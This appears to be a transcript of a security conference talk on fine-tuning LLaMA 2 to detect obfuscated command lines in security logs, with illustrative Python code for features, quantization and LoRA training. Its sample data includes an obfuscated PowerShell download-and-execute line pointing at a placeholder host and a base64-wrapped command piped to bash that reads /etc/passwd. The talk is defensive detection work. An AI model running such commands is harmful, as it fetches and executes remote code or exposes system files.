
Thanks, everyone. I'm going to start this presentation off with a little poll, so please raise your hands if you've ever played with ChatGPT or any LLM. Yep, at this point I expect most of the room to have their hands up. Actually, keep your hands up: keep them up if you use ChatGPT, or any LLM for that matter, about once a week. Cool, I still see most of the hands. How about twice a week-ish, every other day? Cool, fewer hands, but still about half the room. How about every day, or most days? Wow, that's a good amount of the room. You can go ahead and put your hands down.
I just wanted to get a quick pulse on how familiar we are with LLMs, and also to show how prevalent they've become. Think about the context: two years ago the term LLM wasn't even widely known; one year ago ChatGPT had only been out for a couple of months and we were just starting to see how cool it was; and now we're getting to the point where we're trying to deeply integrate LLMs into our workflows. As a machine learning engineer, I'm pretty excited about that. So today I'm going to talk about one way we can integrate LLMs into our security workflows: we're going to explore the idea of fine-tuning LLMs for security log detections.
Just a quick introduction of who I am before I start. I'm Wilson Tang, I go by he/him pronouns, and I'm a proud second-generation Asian-American. Also, a quick shout-out: it actually happens to be my mom's birthday today, and she's watching from home, so happy birthday, Mom. In my current role I'm a machine learning engineer on the threat hunting team at Adobe. I earned my master's degree in computer science from the University of Washington in 2022, and some of my hobbies include cooking (love to cook), traveling (love to eat new food in new places), and video gaming (love to play this game called Valorant).
All right, a quick agenda of what I'm going to go over today. I'll talk about traditional security log detections and some of their limitations, and the way I'm going to go about it is through a case study of command obfuscation detection. Then we'll go through a brief LLM overview, talk about how we fine-tune LLMs specifically for command obfuscation detection, and finally I'll make some generalizations to other use cases we can start to think about. So let's dive right into it and talk about traditional security log detections. When we think about these, we're usually thinking in a rule-based realm: we look at our log events and we look for certain predefined signatures in those events. For example, is this process executing some known malware? Is this login coming from some blacklisted ASN? All those sorts of things (there's a rough sketch of that kind of rule below). But what if our detection needs something more sophisticated, something a little more quote-unquote dynamic? I know that's a pretty loaded term that can be used in gimmicky ways; here I just mean detections that can't be easily written as a simple query. At Adobe, on our threat hunting team, we're trying to use machine learning to address some of these concerns.
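As a rough sketch of what a signature-style rule like that could look like in code, the event fields, hash list, and ASN list below are hypothetical placeholders rather than anything from the talk:

```python
# Hypothetical signature-style rule: flag events whose process hash or source
# ASN appears on a predefined blocklist. Field names and list contents are
# made up for illustration only.
KNOWN_MALWARE_HASHES = {"0123456789abcdef0123456789abcdef"}
BLACKLISTED_ASNS = {64496, 64511}

def matches_signature(event: dict) -> bool:
    """Return True if the log event matches any predefined signature."""
    if event.get("process_hash") in KNOWN_MALWARE_HASHES:
        return True
    if event.get("source_asn") in BLACKLISTED_ASNS:
        return True
    return False

print(matches_signature({"process_hash": "deadbeef", "source_asn": 64496}))  # True
```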
Now, with this big LLM boom, we're seeing a lot of use cases mainly for text generation, so mostly things like personal assistants. In this project, though, we're going to look at how we can leverage LLMs, or whether we can leverage LLMs, for a classification task, and specifically whether we can use them to classify our security log detections correctly. Now I'm going to start on our specific case study: command obfuscation detection. Before we can actually start detecting it, let's go over what it is. Command obfuscation is a technique that makes a standard command line intentionally difficult to read while still executing the same functionality. The example on this slide comes from a really good talk on obfuscation from a couple of years ago: you have a sample command line up top, and in the obfuscated version you can see a bunch of special characters, but both of them still execute the same functionality. The main danger here is that we can have a lot of mature detections on our command lines, but a lot of them could be rendered basically useless if an attacker is able to obfuscate their commands, maybe slightly, maybe a lot, and evade some of those detections. Just a side note: not all obfuscation is malicious. There are definitely operational use cases, for example using base64 encoding to shorten these command lines (there's a rough illustration of base64-style obfuscation below), so keep the nature of it in mind. Also, in this presentation we're only going to talk about detecting obfuscation; we're not going to be concerned with de-obfuscating any commands, although that is another pretty cool use case we can start thinking about leveraging LLMs for, too.
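To make the idea concrete, here is a small illustration (not the example from the slide) of how base64 can hide a command line while preserving its behavior; the wrapped command is built in Python purely for display:

```python
import base64

original = "cat /etc/passwd"

# Encode the command, then build an equivalent one-liner that decodes and
# executes it. Same behavior, but a naive string match on the original
# command line no longer fires.
encoded = base64.b64encode(original.encode()).decode()
obfuscated = f"echo {encoded} | base64 -d | bash"

print(original)    # cat /etc/passwd
print(obfuscated)  # echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
```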
All right, now I'm going to dive into some techniques other than fine-tuning LLMs for detecting this command obfuscation; some of them involve machine learning. I'm going to go over them fairly quickly, so don't worry about understanding everything all the way through; I'm just trying to paint a big picture of what other techniques exist, so we can understand why we're leveraging fine-tuning here as well. The first way, not machine learning but more in the standard rule-based security log detection space, is to just apply some rule-based logic. For example, we can ask the question: does this command line contain a specific percentage of special characters, maybe 50, 70, 80 percent, something like that? Hopefully from that question alone you can see it's not super flexible. We'd need a lot of manual tuning, maybe more rules, maybe more sophisticated rules, just to get it right, and at the end we might not be able to curate a good set of questions to actually detect obfuscation, because it's a pretty broad realm and the rules won't necessarily generalize well across all kinds of obfuscation.
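As a minimal sketch of that kind of rule, the threshold below is arbitrary and would need manual tuning per environment, which is exactly the limitation being described:

```python
import string

ALLOWED = string.ascii_letters + string.digits + " "

def special_char_ratio(cmd: str) -> float:
    """Fraction of characters that are not letters, digits, or spaces."""
    if not cmd:
        return 0.0
    return sum(1 for c in cmd if c not in ALLOWED) / len(cmd)

def looks_obfuscated(cmd: str, threshold: float = 0.5) -> bool:
    return special_char_ratio(cmd) >= threshold

print(looks_obfuscated("whoami"))          # False
print(looks_obfuscated("^w^h^o^a^m^i"))    # True (caret-style obfuscation)
```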
So now let's jump into some machine learning techniques. We'll start with a simple one called logistic regression, which, in a very crude summary, you can boil down to a learned equation that outputs a probability between 0 and 1. That's sort of illustrated in the diagram on the right: you have the logistic regression curve, with one group of data closer to 1 and another group closer to 0, and you can imagine the obfuscated data sitting toward the 1 and the non-obfuscated data toward the 0. With logistic regression we're trying to learn the equation that gets us to that scenario, and the way we get there is through a process called feature engineering: we choose certain features of the data that we think are important for classification. For example, maybe character frequency matters, so the frequency of the letter a, b, c, all the way down to z; maybe we care about the frequency of special characters like semicolons, commas, and periods; maybe we care about string length; maybe we care about entropy, the randomness of a string; maybe we care about whitespace density. You can go down the list and experiment with all of them; that is the process of feature engineering. Then, once you have your nicely curated set of features, you pass them into the logistic regression equation, and it tries its best to learn weights that match the data.
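Here is a toy sketch of that pipeline using scikit-learn; the feature choices, the handful of labeled samples, and the labels are all made up for illustration, and a real detection would need a much larger curated data set:

```python
import math
from collections import Counter

import numpy as np
from sklearn.linear_model import LogisticRegression

def entropy(s: str) -> float:
    """Shannon entropy of the characters in the string."""
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def featurize(cmd: str) -> list:
    """Hand-engineered features: length, special-char ratio, whitespace density, entropy."""
    specials = sum(1 for c in cmd if not c.isalnum() and not c.isspace())
    return [len(cmd), specials / len(cmd), cmd.count(" ") / len(cmd), entropy(cmd)]

# Tiny, made-up training set: (command, label) with 1 = obfuscated.
samples = [
    ("whoami", 0),
    ("ls -la /var/log", 0),
    ("echo d2hvYW1p | base64 -d | bash", 1),
    ('I`E`X((New-Object Net.WebClient).DownloadString("http://x/a"))', 1),
]
X = np.array([featurize(cmd) for cmd, _ in samples])
y = np.array([label for _, label in samples])

clf = LogisticRegression().fit(X, y)
print(clf.predict_proba([featurize("cat /etc/passwd")])[0][1])  # P(obfuscated)
```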
Hopefully, at the end, you get some sort of representation that looks like the nice diagram on the right. In simpler cases you'll get there, but in more complicated cases you won't necessarily; it really relies on having a really nice set of curated features. Something else important to note is that logistic regression starts to fail when you pass too many features into it, which is why we want to think about other solutions. So now let's step a little closer to the LLM realm and talk about quote-unquote traditional deep learning, even though it's still a fairly new field. In this deep learning approach we use things called neural networks, and what that buys us is that we don't need to do any of this feature engineering; we really only need to pass in a vector representation of the data, which is much simpler than feature engineering. In the sample here, we take the whoami bash command and convert it into numbers: you can imagine each number corresponds to a character in the command line, so w is the 23rd letter of the alphabet, h is the 8th, o is the 15th, and so on, and you end up with a numerical, vectorized representation of the data. Then you pass that vectorized data through a neural network which, in another really crude summary, boils down to a giant matrix multiplication, and at the end you get an output: either obfuscated or not. What we get out of this is more generalization than the logistic regression technique, and we don't need to do any feature engineering.
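As a minimal sketch of that vectorization step, the vocabulary and fixed length below are arbitrary choices; a real model would typically learn embeddings on top of these indices:

```python
import string

# Map every printable character to an integer id; reserve 0 for padding.
VOCAB = {ch: i + 1 for i, ch in enumerate(string.printable)}
MAX_LEN = 32

def vectorize(cmd: str) -> list:
    """Turn a command line into a fixed-length vector of character ids."""
    ids = [VOCAB.get(ch, 0) for ch in cmd[:MAX_LEN]]
    return ids + [0] * (MAX_LEN - len(ids))  # pad to a fixed length

print(vectorize("whoami")[:8])  # [33, 18, 25, 11, 23, 19, 0, 0] with this vocabulary
```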
But the hard part of deep learning is experimenting with different model architectures and trying to find the right architecture that actually fits our data well, and that's where we jump into LLMs. Two main things have really enabled LLMs to go this far. The first is the Transformer architecture, introduced in the 2017 paper "Attention Is All You Need". It's an amazing paper to read; I'm not going to go into its details in this presentation, but it's a great way to understand the basis of how LLMs work, and it's still how things are done today, just stacking more Transformer layers on top of each other. The second thing that enabled LLMs to go this far, largely because of the Transformer architecture, is that we're able to train on terabytes of data over many days or weeks of GPU time. On the right is an older data set breakdown for LLaMA 1 from Meta, one of the popular models that actually open-sourced what it trained on, with the exact proportions and disk sizes, and you can see LLaMA 1 trained on terabytes. The newer models probably train on hundreds of terabytes, maybe even petabytes at this point, who knows. There's a lot of data that goes into this. Where I'm going with this, and why we take the fine-tuning approach, is that there's really no need to quote-unquote reinvent the wheel: it's pretty costly and pretty time-consuming to pre-train these models from scratch. What we can do to simplify the process is take model checkpoints from the internet and run this fine-tuning process ourselves.
Fine-tuning means continuing to train the model on our own custom data set, and that data set can be relatively small, because the model is already pre-trained: it already understands language, and we just need to pass in some smaller amount of data to tweak the model's parameters so it works on our task. Next, I'm going to go through a sample code walkthrough. I don't really want you to get too nitty-gritty about understanding the complexities of every code bit; I just want you to understand the overarching concepts so you see what this whole process of fine-tuning entails. The first thing we have to do is get our data set. In this context of command obfuscation, maybe we grab some command-line events from our environment and run some open-source or manual obfuscation tools over them to create synthetic data, or grab some already-obfuscated commands if we have them, and then we create template prompts around those commands to make our training samples. The example up here is a simple illustration of what your prompt can be; we could get into the specifics of prompt engineering here, but I'm not going to touch on that. The prompt is split into a few sections. The first is a description of the problem: "Below is an instruction that describes a binary classification task for command obfuscation detection." Then we follow up with an instruction: "Analyze the following bash command line. If the command is obfuscated, output Yes; if the command is not obfuscated, output No." The input passes in the command line, and the output will be Yes or No; you can imagine that if the input were obfuscated, we would want the output to say Yes, and that's what we train on.
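A small sketch of turning labeled commands into that kind of training prompt; the exact template wording here is paraphrased from the slide rather than copied from the actual project:

```python
# Instruction-style prompt template for the binary classification task.
PROMPT_TEMPLATE = """Below is an instruction that describes a binary classification task for command obfuscation detection.

### Instruction:
Analyze the following bash command line. If the command is obfuscated, output Yes. If the command is not obfuscated, output No.

### Input:
{command}

### Output:
{label}"""

def build_sample(command: str, obfuscated: bool) -> str:
    """Fill the template with one labeled command to create a training sample."""
    return PROMPT_TEMPLATE.format(command=command, label="Yes" if obfuscated else "No")

print(build_sample("echo d2hvYW1p | base64 -d | bash", True))
```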
Now that you've seen this training example, you can see it's a sort of hacky approach to simulating binary classification. This isn't the traditional way we might think of binary classification, like the logistic regression example where we output a probability between 0 and 1; this is a hackier approach that just says, hey, we want the output from the LLM to be Yes or No. Now let's actually get into the code, starting with importing the LLM. The LLM we're going to use in this presentation is LLaMA 2 7B. It's already outdated at this point: LLaMA 3 is out, and every week it seems like there's a new LLM being released boasting the best benchmarks. We're also looking into Microsoft's Phi-3 right now, because it's a pretty small LLM and pretty good. This model comes from Hugging Face which, if you don't know what it is, is a popular open-source repository, kind of like GitHub, specifically for machine learning models and data sets. All right, before we actually import it, let's set up some quantization to reduce our GPU memory usage. This is necessary because these models, even the 7B, take a lot of GPU memory. The reason is that, by default, these LLMs store four bytes per parameter; each parameter, each weight, each number in the model, if you'll go with me on that, takes four bytes of precision. So 7 billion parameters times 4 bytes per parameter is about 28 GB of GPU memory just to import the model, and that's not even including any of the data we need to put on the GPU as well. That's a lot of GPU memory: we wouldn't be able to use most commodity GPUs; we'd need the more expensive ones like A100s and H100s. So if we want to be able to leverage some cheaper GPUs, we have to set up quantization, which means reducing the precision from four bytes down to four bits instead, which is substantially less. Then 7 billion parameters times 4 bits per parameter comes out to about 3.5 GB of GPU memory, which is much more manageable, and this is just some config to set that up.
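That config, in the Hugging Face transformers/bitsandbytes integration, looks roughly like the snippet below; the specific quantization type and compute dtype are common choices rather than necessarily the ones used in the talk, and the exact arguments can vary by library version:

```python
import torch
from transformers import BitsAndBytesConfig  # requires the bitsandbytes package

# Load model weights in 4-bit precision instead of the default full precision.
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",               # normalized-float 4-bit quantization
    bnb_4bit_compute_dtype=torch.bfloat16,   # dtype used for the actual matmuls
    bnb_4bit_use_double_quant=True,          # quantize the quantization constants too
)
```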
Next, we import the tokenizer from LLaMA 2. What the tokenizer does for us is that vectorization of the data, so we don't need to do it manually ourselves; think back to the deep learning slide where we converted whoami into a vector by hand, and imagine the tokenizer doing that for us. It's not just more convenient, it's actually necessary, because LLaMA 2 was trained on its own tokenized representation of the data, so we can't just pass in our own tokenized examples and expect it to work, because it won't. We have to use LLaMA's tokenizer for the model to work. This is just some code to import it; the important thing is really the model repo name at the top, and I'm not going to talk about the other parameters. Then, finally, we import the model itself from Hugging Face: we give it the model repo name and pass in the quantization config, so we get the model loaded in and quantized.
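Loading the tokenizer and the quantized model might look roughly like this; the repo name is the gated LLaMA 2 7B checkpoint on Hugging Face (you need to accept Meta's license to download it), and bnb_config is the quantization config from the previous sketch:

```python
from transformers import AutoTokenizer, AutoModelForCausalLM

model_repo_name = "meta-llama/Llama-2-7b-hf"  # gated repo on Hugging Face

tokenizer = AutoTokenizer.from_pretrained(model_repo_name)
tokenizer.pad_token = tokenizer.eos_token     # LLaMA 2 ships without a pad token

model = AutoModelForCausalLM.from_pretrained(
    model_repo_name,
    quantization_config=bnb_config,           # 4-bit config from the previous sketch
    device_map="auto",                        # place layers on the available GPU(s)
)
```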
Now, one best practice before we actually start running the fine-tuning is to test the model's outputs first, because if the LLM already works out of the box on our task, then there's really no need to fine-tune it ourselves. So we run our raw text through the tokenizer; the raw text, you can imagine, is that template prompt from a couple of slides back, except that we remove the output section, no Yes or No, just a blank, because that's what we want the model to generate for us. There's a line in there, max_new_tokens=1, which means we just want the model to output one new token, so just the Yes or No in our example, plus all these other nice parameters we can set. Finally, we can print out the outputs, do some stats on them, and get some baseline metrics before we start. Then we load in the data set: a train data set that we actually train on, and a test data set that we run evaluation on.
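A sketch of both steps, reusing PROMPT_TEMPLATE, tokenizer, and model from the earlier snippets; the JSONL file names and the "text" column are assumptions about how the data set might be stored:

```python
from datasets import load_dataset

# Baseline check: prompt the un-tuned model with the template minus the label
# and let it generate a single token where the Yes/No should go.
eval_prompt = PROMPT_TEMPLATE.format(command="echo d2hvYW1p | base64 -d | bash", label="")
inputs = tokenizer(eval_prompt, return_tensors="pt").to(model.device)
output_ids = model.generate(**inputs, max_new_tokens=1)   # generate only one new token
print(tokenizer.decode(output_ids[0][inputs["input_ids"].shape[1]:]))

# Load the fine-tuning data; hypothetical local JSONL files with a "text"
# field holding the full prompt for each sample.
dataset = load_dataset("json", data_files={"train": "train.jsonl", "test": "test.jsonl"})
train_dataset, test_dataset = dataset["train"], dataset["test"]
```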
Now let's talk about how we're actually going to run the fine-tuning. The first piece is a method called parameter-efficient fine-tuning, or PEFT, which means we only fine-tune a small number of model parameters. Instead of fine-tuning all 7 billion parameters, we're only concerned with a small number of them, because that makes the process faster and it's all we really need. PEFT is also a popular Hugging Face library that contains multiple methods for fine-tuning, and the more popular implementation is called LoRA, which is low-rank adaptation. It's a technique that reduces the number of parameters being fine-tuned using low-rank matrix operations; that's about all I'll say about it, because it gets very mathematical to explain, but for the purposes of this talk, it's a popular way to do this. In the code, these are some common config values you set for LoRA.
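A typical LoRA config with the PEFT library looks something like this; the rank, alpha, and target modules below are common starting values rather than the ones from the talk:

```python
from peft import LoraConfig

peft_config = LoraConfig(
    r=16,                                  # rank of the low-rank update matrices
    lora_alpha=32,                         # scaling factor applied to the updates
    lora_dropout=0.05,
    bias="none",
    task_type="CAUSAL_LM",
    target_modules=["q_proj", "v_proj"],   # attention projections commonly adapted in LLaMA
)
```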
Then we prepare our training arguments: per-device training batch size, gradient accumulation, learning rate, max steps (that one's super important), and you get your training arguments. Finally, we put it all together and pass it into our trainer: pass in our model, our training data set, our PEFT config, our tokenizer, and the training args, and then we run trainer.train(). Depending on how big your GPU is, how big your data set is, and how fast your GPU is, trainer.train() could take a matter of minutes or a matter of hours. At the end of it, you get your final fine-tuned model.
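Putting it together might look roughly like this, using TRL's SFTTrainer, which accepts a PEFT config directly; the hyperparameter values are placeholders, and the exact keyword arguments have shifted across trl versions, so treat this as a sketch rather than copy-paste code:

```python
from transformers import TrainingArguments
from trl import SFTTrainer

training_args = TrainingArguments(
    output_dir="./llama2-obfuscation-detector",
    per_device_train_batch_size=4,
    gradient_accumulation_steps=4,
    learning_rate=2e-4,
    max_steps=500,               # called out in the talk as an important knob
    logging_steps=25,
)

trainer = SFTTrainer(
    model=model,
    train_dataset=train_dataset,
    peft_config=peft_config,
    tokenizer=tokenizer,
    args=training_args,
    dataset_text_field="text",   # column holding the full prompt text
    max_seq_length=512,
)
trainer.train()
trainer.save_model()             # writes the fine-tuned adapter weights to output_dir
```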
Finally, you can run your model outputs again, compute some metrics like we did before, and see how your model improved. And hopefully, after going through that amount of code, we can start talking about some of the advantages of fine-tuning compared to the other methods. The first advantage is that we abstract most of these traditional machine learning processes away just by starting with a pre-trained model. What I mean is: we don't really need to do the feature engineering, because we're in the deep learning realm; there's no model architecture experimentation, because we're using the model straight from LLaMA, so we don't need to play with the architecture, we just use its architecture; and there's no more manual vectorization, because we use the model's pre-trained tokenizer instead. All we're really concerned about is providing the model with our raw data set. One other thing to emphasize is that with fine-tuning LLMs, we care a lot about data quality: passing in good-quality data to fine-tune the model on is the most important part here. That's not to say it doesn't matter in other ML problems; it does. There's a saying that in ML, data quality and data curation are the most important steps, so you should always concentrate on that.
But with fine-tuning, you can abstract a lot of the other process away and just focus on the data set itself. So I just tried to convince you that fine-tuning is a great approach, but this wouldn't be a fair or complete presentation if I didn't also give you some of the trade-offs of fine-tuning LLMs. The first trade-off: do we really need all 7 billion parameters for this classification? I'm going to go ahead and say probably not. Those 7 billion parameters are really good for generating text, and necessary for generating text, but when we're talking about classifying data, where we just need a yes or no, we might not need all 7 billion parameters to get the correct classification. And this typically requires more GPU memory and time: even though it's substantially less than pre-training an LLM from scratch, we still need a GPU and some GPU cycles to actually fine-tune the model. But these are the trade-offs we make for quote-unquote ease of use: we abstract the ML processes away, throw our data set at the LLM, and fine-tune. It's easier to use; we just need to throw a little more compute at it, which, with the cost of GPUs these days, is money too. What I really want you to take away is that even though this isn't the most perfect approach, every approach is going to have its trade-offs; fine-tuning is just a new tool we can consider when we're developing security log detections. So, as a good machine learning engineer, and maybe as a good security practitioner, we should be considering all our tools and all the different approaches we can use for developing these detections, and then we can make a good, clear, final decision at the end after we evaluate them all.
Just some closing thoughts. For applying this to other use cases, you can generally replicate most of these steps, pretty much copy and paste, for your own use cases and replace the data set with your own. To be honest, you can find very similar code in many open-source repos and blog posts online; this fine-tuning approach through the Hugging Face libraries is pretty standardized, and a lot of people are doing similar things. But if you want to follow this presentation in particular and stay in touch with the work, I'm going to be posting updates, so you can add me on LinkedIn and stay tuned. I'll at least post this BSides talk if you're curious about the code as well. So yeah, I hope you learned at least one new thing out of this presentation and deepened your perspective on LLMs. Thanks for listening, and I'll close out the slides. [Applause] Well, that was amazing, thank you so much, Mr. Tang. We do have one question: as a machine learning engineer, how do you think AI will affect the security industry and future jobs? That is a loaded question.
I'll talk about it in the context of security log detections. I think it'll really help propel us to do new types of detections, and not just with LLMs; I'm talking about things like anomaly detection and all the other machine learning approaches too. I think it'll enable our security analysts to have more tools to do more mature types of detection, so I think it might just grow the security industry and make us more mature. Fantastic answer. Well, thank you so much, Mr. Tang, we really appreciate you coming out and presenting. We actually have something special just for you. And for our audience, if you have further questions for him, please feel free to meet him up in the City View area. Our gifts are actually coming from Socket Security this year, one of our main sponsors, and we are so grateful for that. Obviously we couldn't do this without our volunteers and our sponsors, so we much appreciate it, and we really appreciate you coming out, sir. Thank you so much, fabulous job. Yeah, so we would